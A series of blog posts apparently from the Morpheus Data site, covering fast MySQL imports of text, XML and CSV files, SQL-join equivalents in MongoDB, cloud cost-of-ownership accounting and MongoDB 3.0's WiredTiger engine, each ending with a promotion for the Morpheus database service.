Instead of worrying about these settings on your own system, you could opt to use a service like Morpheus, which offers databases as a service on the cloud. With Morpheus, you can easily and quickly set up your choice of several databases (including MySQL, MongoDB, Redis, and Elasticsearch).

In addition, MySQL and Redis have automatic backups, and each database instance is replicated, archived, and deployed on a high-performance infrastructure with solid state drives. You can sign up for a free demo now to see how you can begin taking advantage of this service! Or, check out this 2-minute Morpheus Data intro video.

The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables


One of the best ways to improve the performance of MySQL databases is to determine the optimal approach for importing data from other sources, such as text files, XML, and CSV files. The key is to correlate the source data with the table structure.

Data is always on the move: from a Web form to an order-processing database, from a spreadsheet to an inventory database, or from a text file to a customer list. One of the most common MySQL database operations is importing data from such an external source directly into a table. Data importing is also one of the tasks most likely to create a performance bottleneck.

The basic steps entailed in importing a text file to a MySQL table are covered in a Stack Overflow post from November 2012: first, use the LOAD DATA INFILE command.

The basic MySQL commands for creating a table and importing a text file into the table. Source: Stack Overflow

Note that you may need to enable the parameter "--local-infile=1" to get the command to run. You can also specify which columns the text file loads into:

This MySQL command specifies the columns into which the text file will be imported. Source: Stack Overflow

In this example, the file's text is placed into variables "@col1, @col2, @col3," so "myid" appears in column 1, "mydecimal" appears in column 3, and column 2 has a null value.

The table resulting when LOAD DATA is run with the target column specified. Source: Stack Overflow
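As a rough sketch of what those statements can look like when driven from Python rather than the mysql client (assuming the third-party mysql-connector-python package; the database, table, column, and file names are illustrative, and the server must also permit LOAD DATA LOCAL):

import mysql.connector

# allow_local_infile mirrors the --local-infile=1 client setting mentioned above.
conn = mysql.connector.connect(host="localhost", user="root", password="secret",
                               database="testdb", allow_local_infile=True)
cur = conn.cursor()

# Basic import: one line per row, tab-separated by default.
cur.execute("""
    LOAD DATA LOCAL INFILE '/tmp/data.txt'
    INTO TABLE mytable
""")

# Targeted import: read each line into user variables, then map them to columns,
# leaving the second column NULL as in the example above.
cur.execute("""
    LOAD DATA LOCAL INFILE '/tmp/data.txt'
    INTO TABLE mytable (@col1, @col2, @col3)
    SET myid = @col1, mydecimal = @col3
""")

conn.commit()
cur.close()
conn.close()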

The fastest way to import XML files into a MySQL table

As Database Journal's Rob Gravelle explains in a March 17, 2014, article, stored procedures would appear to be the best way to import XML data into MySQL tables, but after version 5.0.7, MySQL's LOAD XML INFILE and LOAD DATA INFILE statements can't run within a Stored Procedure. There's also no way to map XML data to table structures, among other limitations.

However, you can get around most of these limitations if you can target the XML file using a rigid and known structure per proc. The example Gravelle presents uses an XML file whose rows are each contained within a parent element, and whose columns are represented by a named attribute:

You can use a stored procedure to import XML data into a MySQL table if you specify the table structure beforehand. Source: Database Journal

The table you're importing to has an int ID and two varchars: because the ID is the primary key, it can't have nulls or duplicate values; last_name allows duplicates but not nulls; and first_name allows up to 100 characters of nearly any data type.

The MySQL table into which the XML file will be imported has the same three fields as the file. Source: Database Journal

Gravelle's approach for overcoming MySQL's import restrictions uses the "proc-friendly" Load_File() and ExtractValue() functions.

MySQL's XML-import limitations can be overcome by using the Load_file() and ExtractValue() functions. Source: Database Journal

Benchmarking techniques for importing CSV files to MySQL tables

When he tested various ways to import a CSV file into MySQL 5.6 and 5.7, Jaime Crespo discovered a technique that he claims improves the import time for MyISAM by 262 percent to 284 percent, and for InnoDB by 171 percent to 229 percent. The results of his tests are reported in an October 8, 2014, post on Crespo's MySQL DBA for Hire blog.

Crespo's test file was more than 3GB in size and had nearly 47 million rows. One of the fastest methods in Crespo's tests was grouping queries in a multi-insert statement, which is what "mysqldump" uses. Crespo also attempted to improve LOAD DATA performance by augmenting the key_cache_size and by disabling the Performance Schema.

Crespo concludes that the fastest way to load CSV data into a MySQL table without using raw files is to use LOAD DATA syntax. Also, using parallelization for InnoDB boosts import speeds.

Whether you're a CIO, IT leader or DevOps ninja, you won't find a more straightforward way to monitor your MySQL, MongoDB, Redis, and ElasticSearch databases than by using the dashboard interface of the Morpheus Data platform as a service (PaaS) (check out this infographic to learn more about PaaS). Morpheus is the first and only infrastructure-agnostic cloud management solution, as well as the only PaaS solution to support SQL, NoSQL, and in-memory databases. 

You can provision, deploy, and host your databases from a single dashboard. The service includes a free full replica set for each database instance, as well as automatic daily backups of MySQL and Redis databases. Visit the Morpheus site to sign up for a free demo!


Watch this 2-minute intro video to see how Morpheus Data can save you time, money and sanity.

3 Approaches to Creating a SQL-Join Equivalent in MongoDB


 

Integrating MongoDB document data with SQL and other table-centric data sources needn't be so processor-intensive.

TL;DR: While there's no such operation as a SQL-style table join in MongoDB, you can achieve the same effect without relying on table schema. Here are three techniques for combining data stored in MongoDB document collections with minimal query-processing horsepower required.

The signature relational-database operation is the table join: combine data from table 1 with data from table 2 to create table 3. The schema-less document-container structure of MongoDB and other non-relational databases makes such table joins impossible.

Instead, as the MongoDB Manual explains, MongoDB either denormalizes the data by storing related items in a single document, or it relates that data in separate documents. One way to relate documents is via manual references: the _id field of one document is saved in the other document as a reference. The application simply runs a second query to return the related data.

When you need to link multiple documents in multiple collections, DBRefs let you relate documents using the value of one document’s _id field, collection name, and, optionally, its database name. The application resolves DBRefs by running additional queries to return the referenced documents.
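A minimal sketch of the manual-reference pattern (assuming the pymongo driver and a local MongoDB instance; the library database and its collections simply echo the example further below):

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017/")
db = client["library"]

# Store the related document's _id as a manual reference...
author_id = db.authors.insert_one({"name": "Daniel Defoe"}).inserted_id
db.books.insert_one({"title": "Robinson Crusoe", "author_id": author_id})

# ...then "join" with a second query instead of a table join.
book = db.books.find_one({"title": "Robinson Crusoe"})
author = db.authors.find_one({"_id": book["author_id"]})
print(book["title"], "-", author["name"])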

A tutorial in the MongoDB Manual demonstrates the use of denormalization in a social-media application. The manual also provides a SQL-to-aggregation mapping chart.

Simple function for 'joining' data within a single MongoDB collection

An alternative approach to relating data in a MongoDB collection is via a function you run in the MongoDB client console. The process is explained in a Stack Overflow post from March 2014.

For example, in a library database, you first create fields for "authors", "categories", "books", and "lending".

The fields to be "joined" in the MongoDB database are "authors", "categories", "books", and "lending". Source: Stack Overflow

Then you apply the function.

Run MongoDB's find() method to retrieve related documents in a collection. Source: Stack Overflow

The result is the rough equivalent of a join operation on SQL tables.

After running the find() method the documents in the collection related as specified are returned. Source: Stack Overflow

Ensuring MongoDB apps integrate with your organization's other data

Lack of a one-to-one join equivalent is only one of the many ways MongoDB differs from SQL databases. In a July 17, 2013, post, Julian Hyde, lead developer of the Mondrian open-source OLAP engine, explains how he built a MongoDB-to-SQL interface using the Optiq dynamic data management framework.

Optiq features a SQL parser and a query optimizer powered by rewrite rules. Hyde created rules to map SQL tables onto MongoDB collections, and to map relational operations onto MongoDB's find and aggregate operators. The result is the equivalent of a JDBC driver for MongoDB based on a hybrid query-processing engine intended to shift as much query processing as possible to MongoDB. Joins and other operations are handled by the client.

The process allows you to convert each MongoDB collection to a table. The COLUMNS and TABLES system tables are supplied by Optiq, and the ZIPS view is defined in mongo-zips-model.json.

The Optiq framework allows a MongoDB collection to be converted to a SQL-style table. Source: Julian Hyde

Simple management of SQL, NoSQL, and in-memory databases is a key feature of the new Morpheus Data platform as a service (PaaS) solution. With Morpheus you can provision, deploy, and monitor heterogeneous MySQL, MongoDB, Redis, and ElasticSearch databases from a single point-and-click console. Morpheus lets you work with all your databases across public, private, and hybrid clouds in just minutes. Each database instance you create includes a free full replica set for built-in fault tolerance and fail over.

In addition, the service allows you to migrate existing databases from a private cloud to the public cloud, or from public to private. A new instance of the same database type is created in the other cloud, and real-time replication keeps the two databases in sync. Visit the Morpheus site to sign up for a demo now!


How to Measure the ROI of Your Cloud Spend


Quantifying the cost of cloud ownership is no simple task. Use these tips to measure the ROI of your cloud spend.

Getting an accurate assessment of the total costs of public, private, and hybrid clouds requires thinking outside the invoices. 

Quantifying Cloud Cost of Ownership

The big question facing organizations of all types and sizes is this: “Which is more cost-effective for hosting our apps and data, in-house or cloud?” While it may not be possible to achieve a truly apples-to-apples comparison of the two options, a careful cost accounting can be the key to achieving the optimal balance of public, private, and hybrid cloud alternatives.

If accountants ruled the world, all business decisions would come down to one number: maximum profit for the current quarter or year. In fact, basing your company’s strategy solely on short-term financial returns is one of the fastest ways to sink it. Yet so many IT decision makers look to a single magical, mystical (some would say mythical) figure when planning their tech purchases: total cost of ownership, or TCO.

Determining TCO is particularly elusive when assessing cloud alternatives to in-house development and management of an organization’s apps and data. How do you quantify accurately the benefits of faster time to market, for example? Or faster and simpler application updates? Or an IT staff that’s more engaged in its work? These are some of the questions posed by Gigaom Research’s David S. Linthicum in a May 9, 2014, article.

Linthicum points out that while tools such as Amazon Web Services’ TCO calculator, Google’s TCO Pricing Calculator, and the collection of cost calculators at The Cloud Calculator help you understand the “simple costs and benefits” of using cloud services, they exclude many of the most important aspects of the to-cloud-or-not-to-cloud decision.

The AWS TCO Calculator is intended to provide customers with an accurate cost comparison of public-cloud services vs. on-premises infrastructure. Source: AWS Official Blog

The most glaring shortcoming of TCO calculators is their one-size-fits-all nature. By failing to consider the unique qualities of your company – your business processes, the skill level of your staff, your existing investment in hardware, software, and facilities – the calculators present only a part of the big picture.

An even-greater challenge for organizations, according to Linthicum, is how to quantify the value of agility and faster time to market. By including these more-nebulous benefits in the TCO calculation, the most cost-effective choice may be the cloud even when a traditional hardware-software-facilities TCO analysis gives the edge to in-house systems. Linthicum recommends seven aspects to include in your “living model” (a toy cost roll-up follows the list):

  1. The cost of “sidelining” the assets in your existing infrastructure
  2. The amount of training for existing staff and hiring of new staff needed to acquire the requisite cloud skills
  3. The cost of migrating your apps and data to the cloud, and the degree of re-engineering the migration will require
  4. The cost of using public cloud services over an extended time, including potential changes in operational workload
  5. The value the company places on faster time to market, faster updates for apps and data, and the ability to respond faster to changing business conditions
  6. The savings resulting from reduced capital expenditures in the future, which often boils down to opex vs. capex
  7. The risk of the potential failure to comply with rules and regulations governing particular industries, such as healthcare, insurance, and financial services
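To make the “living model” idea concrete, here is a toy roll-up of those line items in Python. Every figure is a made-up placeholder, not a benchmark; the only point is that one-time and recurring costs (and the value assigned to the softer benefits) are totalled over the same evaluation window:

# All figures are hypothetical placeholders for illustration only.
EVALUATION_YEARS = 3

one_time_costs = {
    "sidelined on-premises assets": 40000,
    "staff training and hiring": 25000,
    "migration and re-engineering": 60000,
}

annual_costs = {
    "public cloud service fees": 90000,
    "compliance and risk allowance": 10000,
}

annual_benefits = {
    "faster time to market (estimated value)": 50000,
    "reduced future capital expenditure": 30000,
}

total_cost = sum(one_time_costs.values()) + EVALUATION_YEARS * sum(annual_costs.values())
total_benefit = EVALUATION_YEARS * sum(annual_benefits.values())

print(f"3-year cost:    ${total_cost:,}")
print(f"3-year benefit: ${total_benefit:,}")
print(f"Net:            ${total_benefit - total_cost:,}")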

Boiling down the public cloud vs. private cloud equation

As tricky as it can be to get an accurate read on the total cost of public cloud services, calculating the many expenses entailed in operating a private cloud setup can leave experienced IT planners scratching their heads. In a September 9, 2014, article on ZDNet, Intel’s Ram Lakshminarayanan outlines four areas where the costs of public and private clouds differ.

While public cloud services don’t usually charge software licensing fees, their per-hour compute instance fees are likely to be higher for proprietary OSes such as Microsoft Windows than for Linux and other open-source systems. By contrast, proprietary private-cloud vendors often apply a licensing fee for their virtualization software based on the number of CPUs or CPU cores required. (Use of OpenStack and other open-source private cloud software does not entail a licensing fee.)

The biggest cost difference between public and private cloud setups is in infrastructure. Private clouds require upfront expenditures for compute, network, and storage hardware, as well as ongoing costs for power, cooling, and other infrastructure. Public cloud services charge based on pro-rata, per-hour use, although their rates cover the providers’ hardware and facilities costs.

Likewise, support costs that are built into public cloud rates are a separate line item for most private clouds and must be negotiated separately in most cases. Finally, IT staff training must be considered both an upfront and continuing cost that will likely be higher for private clouds than their public counterparts, which benefit from straightforward dashboard interfaces designed for end users. A prime example is the Morpheus application management service, which features an intuitive UI for provisioning databases, apps, and app stack components on private, public, and hybrid clouds in just seconds.

Hybrid clouds in particular depend on cost management

The Goldilocks cloud solution – the one that is “just right” for a great number of small and large organizations – is the hybrid approach that mixes public and private components. This allows the companies to benefit from the public cloud’s efficiency and cost savings while protecting critical data assets in a private cloud. Accurate cost accounting is imperative to ensure both sides of the cloud equation are applied to best advantage for your firm’s data needs.

CFO’s Penny Collen writes in a March 12, 2015, column that TCO for hybrid clouds shouldn’t be approached from a project-life-cycle perspective, but rather from a big-picture view of all operational costs. That’s the only way to get an accurate assessment of all your provisioning alternatives, according to Collen. She identifies four areas in which specific costs must be identified:

  1. Hardware acquisition (asset records, purchase orders, vendor price lists)
  2. Hardware maintenance (as a percentage of acquisition costs and maintenance averages)
  3. Software (based on historic hardware/software ratios in your company)
  4. Infrastructure and tech support (connectivity, facilities, disaster recovery, administration)

One-time costs include the following:

  1. Design
  2. Architecture
  3. Data migration
  4. Data porting
  5. Data cleansing and archiving
  6. User and technical support training
  7. Standardization, upgrades, and customization

Categories in cloud cost accounting include servers, storage, software, labor, networking, facilities, and support. Source: CFO

Cloud-specific costs that must be part of the analysis include the following:

  1. The need for more network capacity
  2. Vendor fees (primarily for public cloud services)
  3. Administration of cloud invoices
  4. Management of relationships with cloud vendors

Last but not least, consider fees related to the cancellation terms stipulated in the cloud service’s contract. Also factor in the cost of migrating to an alternative cloud provider to avoid being squeezed by vendor lock-in.


To find out how Morpheus' PaaS solution can help you avoid cloud lock-in to save time and money, download the use case here.

MongoDB 3.0 First Look: Faster, More Storage Efficient, Multi-model


Document-level locking and pluggable storage APIs top the list of new features in MongoDB 3.0, but the big-picture view points to a more prominent role for NoSQL databases in companies of all types and sizes. The immediate future of databases is relational, non-relational, and everything in between -- sometimes all at once.

Version 3.0 of MongoDB, the leading NoSQL database, is being touted as the first release that is truly ready for the enterprise. The new version was announced in February and shipped in early March. At least one early tester, Adam Comerford, reports that MongoDB 3.0 is indeed more efficient at managing storage, and faster at reading compressed data.

The new feature in MongoDB 3.0 gaining the lion's share of analysts' attention is the addition of the WiredTiger storage engine (which MongoDB acquired in December 2014) and a pluggable storage API. JavaWorld's Andrew C. Oliver states in a February 3, 2015, article that WiredTiger will likely boost performance over MongoDB's default MMapV1 engine in apps where reads don't greatly outnumber writes.

Oliver points out that WiredTiger's B-tree and Log Structured Merge (LSM) algorithms benefit apps with large caches (B-tree) and with data that doesn't cache well (LSM). WiredTiger also promises data compression that reduces storage needs by up to 80 percent, according to the company.


The addition of the WiredTiger storage engine is one of the new features in MongoDB 3.0 that promises to improve performance, particularly for enterprise customers. Source: Software Development Times

Other enhancements in MongoDB 3.0 include the following:

  • Document-level locking for concurrency control via WiredTiger
  • Collection-level concurrency control and more efficient journaling in MMapV1
  • A pluggable API for integration with in-memory, encrypted, HDFS, hardware-optimized, and other environments
  • The Ops Manager graphical management console in the enterprise version

Computing's John Leonard emphasizes in a February 3, 2015, article that MongoDB 3.0's multi-model functionality via the WiredTiger API positions the database to compete with DataStax' Apache Cassandra NoSQL database and Titan graph database. Leonard also highlights the new version's improved scalability.

 

Putting MongoDB 3.0 to the (performance) test

MongoDB 3.0's claims of improved performance were borne out by preliminary tests conducted by Adam Comerford and reported on his Adam's R&R blog in posts on February 4, 2015, and February 5, 2015. Comerford repeated compression tests with the WiredTiger storage engine in release candidate 7 (RC7) -- expected to be the last before the final version comes out in March -- that he ran originally using RC0 several months ago. The testing was done on an Ubuntu 14.10 host with an ext4 file system.

The results showed that WiredTiger's on-disk compression reduced storage to 24 percent of non-compressed storage, and to only 16 percent of the storage space used by MMapV1. Similarly, the defaults for WiredTiger with MongoDB (the WT/snappy bar below) used 50 percent of non-compressed WiredTiger and 34.7 percent of MMapV1.

Testing WiredTiger storage (compressed and non-compressed) compared to MMapV1 storage showed a tremendous advantage for the new MongoDB storage engine. Source: Adam Comerford

Comerford's tests of the benefits of compression for reads when available I/O capacity is limited demonstrated much faster performance when reading compressed data using snappy and zlib, respectively. A relatively slow external USB 3.0 drive was used to simulate "reasonable I/O constraints." The times indicate how long it took to read the entire 16GB test dataset from the on-disk testing into memory from the same disk.

Read tests from compressed and non-compressed disks in a simulated limited-storage environment indicate faster reads with WiredTiger in all scenarios. Source: Adam Comerford

 

All signs point to a more prominent role in organizations of all sizes for MongoDB in particular and NoSQL in general. Running relational and non-relational databases side-by-side is becoming the rule rather than the exception. The new Morpheus Virtual Appliance puts you in good position to be ready for multi-model database environments. It supports rapid provisioning and deployment of MongoDB v3.0 across public, private and hybrid clouds. Sign Up for a Demo now!
